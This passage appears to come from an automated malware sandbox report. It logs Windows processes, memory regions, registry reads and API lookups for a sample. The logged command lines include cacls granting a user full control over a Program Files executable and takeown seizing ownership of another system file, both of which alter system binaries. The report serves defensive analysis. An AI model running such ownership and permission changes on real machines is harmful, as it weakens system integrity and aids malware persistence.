| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x74f5a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x74f80a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x752c0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x74f5f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x74f5fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x74f81030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x74f5a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x74f814b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x74f5a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x74f816f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x74f59970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x75243c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x74f58710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x74f596e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-01-23 14:13:18 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #223: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #223 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Photo Viewer\dir.exe" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:39, Reason: Child Process |
| Unmonitor | End Time: 00:03:45, Reason: Self Terminated |
| Monitor Duration | 00:00:06 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x440 |
| Parent PID | 0x4b0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
E38
0x
8BC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000650000 | 0x00650000 | 0x0066ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000650000 | 0x00650000 | 0x0065ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000660000 | 0x00660000 | 0x00663fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000670000 | 0x00670000 | 0x00671fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000670000 | 0x00670000 | 0x00673fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000680000 | 0x00680000 | 0x00693fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000006a0000 | 0x006a0000 | 0x006dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006e0000 | 0x006e0000 | 0x0071ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000720000 | 0x00720000 | 0x00723fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000730000 | 0x00730000 | 0x00730fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000740000 | 0x00740000 | 0x00741fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00750000 | 0x0080dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000810000 | 0x00810000 | 0x0084ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000850000 | 0x00850000 | 0x0088ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000890000 | 0x00890000 | 0x0089ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000008a0000 | 0x008a0000 | 0x00adffff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x008a0000 | 0x008a1fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000009e0000 | 0x009e0000 | 0x00adffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ae0000 | 0x00ae0000 | 0x00c9ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x00ca0000 | 0x00fd6fff | Memory Mapped File | r |
|
|
|
- |
| cacls.exe | 0x01040000 | 0x01049fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001050000 | 0x01050000 | 0x0504ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x742c0000 | 0x742e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f390000 | 0x7f390000 | 0x7f48ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f490000 | 0x7f490000 | 0x7f4b2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f4b4000 | 0x7f4b4000 | 0x7f4b4fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f4b9000 | 0x7f4b9000 | 0x7f4bbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f4bc000 | 0x7f4bc000 | 0x7f4befff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f4bf000 | 0x7f4bf000 | 0x7f4bffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #224: cmd.exe
47
0
| Information | Value |
|---|---|
| ID | #224 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c qRY2vco2.exe -accepteula "PDIALOG.exe.mui" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:40, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:22 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe30 |
| Parent PID | 0xec8 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
E8C
0x
84C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000640000 | 0x00640000 | 0x0463ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004640000 | 0x04640000 | 0x0465ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004640000 | 0x04640000 | 0x0464ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004650000 | 0x04650000 | 0x04653fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004660000 | 0x04660000 | 0x04661fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004660000 | 0x04660000 | 0x04663fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004670000 | 0x04670000 | 0x04683fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004690000 | 0x04690000 | 0x046cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000046d0000 | 0x046d0000 | 0x047cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000047d0000 | 0x047d0000 | 0x047d3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000047e0000 | 0x047e0000 | 0x047e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000047f0000 | 0x047f0000 | 0x047f1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004800000 | 0x04800000 | 0x0483ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004880000 | 0x04880000 | 0x0488ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004890000 | 0x04890000 | 0x049effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004890000 | 0x04890000 | 0x048dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000048f0000 | 0x048f0000 | 0x049effff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x049f0000 | 0x04aadfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004ab0000 | 0x04ab0000 | 0x04baffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04bb0000 | 0x04ee6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ee00000 | 0x7ee00000 | 0x7eefffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ef00000 | 0x7ef00000 | 0x7ef22fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ef26000 | 0x7ef26000 | 0x7ef26fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef29000 | 0x7ef29000 | 0x7ef29fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef2a000 | 0x7ef2a000 | 0x7ef2cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef2d000 | 0x7ef2d000 | 0x7ef2ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (6)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | qRY2vco2.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
2 | |
| Open | STD_INPUT_HANDLE | - |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 216, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe | os_pid = 0x14c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (13)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
4 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 |
Process #225: dllhost.exe
0
0
| Information | Value |
|---|---|
| ID | #225 |
| File Name | c:\windows\system32\dllhost.exe |
| Command Line | C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:40, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:22 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x304 |
| Parent PID | 0x23c (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
490
0x
344
0x
614
0x
22C
0x
1A4
0x
958
0x
700
0x
85C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x0000006d05560000 | 0x6d05560000 | 0x6d0557ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000006d05560000 | 0x6d05560000 | 0x6d0556ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000006d05570000 | 0x6d05570000 | 0x6d05576fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000006d05580000 | 0x6d05580000 | 0x6d05593fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000006d055a0000 | 0x6d055a0000 | 0x6d0569ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000006d056a0000 | 0x6d056a0000 | 0x6d056a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000006d056b0000 | 0x6d056b0000 | 0x6d056b1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x6d056c0000 | 0x6d0577dfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000006d05780000 | 0x6d05780000 | 0x6d05780fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000006d05790000 | 0x6d05790000 | 0x6d05796fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000006d057a0000 | 0x6d057a0000 | 0x6d057a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000006d057b0000 | 0x6d057b0000 | 0x6d057b0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000006d057c0000 | 0x6d057c0000 | 0x6d058bffff | Private Memory | rw |
|
|
|
- |
| private_0x0000006d058c0000 | 0x6d058c0000 | 0x6d059bffff | Private Memory | rw |
|
|
|
- |
| private_0x0000006d059c0000 | 0x6d059c0000 | 0x6d05acffff | Private Memory | rw |
|
|
|
- |
| rpcss.dll | 0x6d059c0000 | 0x6d05a95fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000006d059c0000 | 0x6d059c0000 | 0x6d05abffff | Private Memory | rw |
|
|
|
- |
| private_0x0000006d05ac0000 | 0x6d05ac0000 | 0x6d05acffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x6d05ad0000 | 0x6d05e06fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000006d05e10000 | 0x6d05e10000 | 0x6d05f0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000006d05f10000 | 0x6d05f10000 | 0x6d0600ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000006d06010000 | 0x6d06010000 | 0x6d0610ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000006d06110000 | 0x6d06110000 | 0x6d06297fff | Pagefile Backed Memory | r |
|
|
|
- |
| imm32.dll | 0x6d062a0000 | 0x6d062d3fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000006d062a0000 | 0x6d062a0000 | 0x6d06420fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000006d06430000 | 0x6d06430000 | 0x6d0782ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000006d07830000 | 0x6d07830000 | 0x6d07830fff | Private Memory | rw |
|
|
|
- |
| private_0x0000006d07840000 | 0x6d07840000 | 0x6d079affff | Private Memory | rw |
|
|
|
- |
| private_0x0000006d07840000 | 0x6d07840000 | 0x6d0793ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000006d07940000 | 0x6d07940000 | 0x6d07942fff | Pagefile Backed Memory | r |
|
|
|
- |
| windowsshell.manifest | 0x6d07950000 | 0x6d07950fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000006d07960000 | 0x6d07960000 | 0x6d07961fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000006d079a0000 | 0x6d079a0000 | 0x6d079affff | Private Memory | rw |
|
|
|
- |
| ole32.dll | 0x6d079b0000 | 0x6d07af0fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00007df5ff570000 | 0x7df5ff570000 | 0x7ff5ff56ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff75683e000 | 0x7ff75683e000 | 0x7ff75683ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff756840000 | 0x7ff756840000 | 0x7ff75693ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff756940000 | 0x7ff756940000 | 0x7ff756962fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff756963000 | 0x7ff756963000 | 0x7ff756964fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff756965000 | 0x7ff756965000 | 0x7ff756966fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff756967000 | 0x7ff756967000 | 0x7ff756967fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff756968000 | 0x7ff756968000 | 0x7ff756969fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff75696a000 | 0x7ff75696a000 | 0x7ff75696bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff75696c000 | 0x7ff75696c000 | 0x7ff75696dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff75696e000 | 0x7ff75696e000 | 0x7ff75696ffff | Private Memory | rw |
|
|
|
- |
| dllhost.exe | 0x7ff757890000 | 0x7ff757896fff | Memory Mapped File | rwx |
|
|
|
- |
| thumbcache.dll | 0x7ffc47230000 | 0x7ffc4727afff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7ffc4cbd0000 | 0x7ffc4ce43fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7ffc511b0000 | 0x7ffc51332fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7ffc52d70000 | 0x7ffc52e05fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffc53a90000 | 0x7ffc53ac2fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffc54210000 | 0x7ffc54226fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffc54280000 | 0x7ffc5428afff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffc543a0000 | 0x7ffc543c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffc543d0000 | 0x7ffc5443afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffc54610000 | 0x7ffc5461efff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ffc54f80000 | 0x7ffc55032fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffc55040000 | 0x7ffc5521cfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ffc55280000 | 0x7ffc552b5fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffc552c0000 | 0x7ffc5535cfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ffc55380000 | 0x7ffc554dbfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffc554e0000 | 0x7ffc5562dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffc55800000 | 0x7ffc558acfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffc55910000 | 0x7ffc559cdfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffc56f10000 | 0x7ffc57094fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffc570a0000 | 0x7ffc571c5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffc571d0000 | 0x7ffc5744bfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffc57540000 | 0x7ffc5759afff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ffc57970000 | 0x7ffc57a14fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
Process #226: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #226 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Journal\PDIALOG.exe" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:40, Reason: Child Process |
| Unmonitor | End Time: 00:03:53, Reason: Self Terminated |
| Monitor Duration | 00:00:13 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe98 |
| Parent PID | 0xea0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
948
0x
CA4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000020000 | 0x00020000 | 0x0003ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00033fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000040000 | 0x00040000 | 0x00041fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x00040000 | 0x00044fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00063fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x000affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000b0000 | 0x000b0000 | 0x000effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000000f0000 | 0x000f0000 | 0x000f3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000100000 | 0x00100000 | 0x00100fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x00111fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000120000 | 0x00120000 | 0x0015ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000160000 | 0x00160000 | 0x0017ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000160000 | 0x00160000 | 0x00160fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x0017ffff | Private Memory | rw |
|
|
|
- |
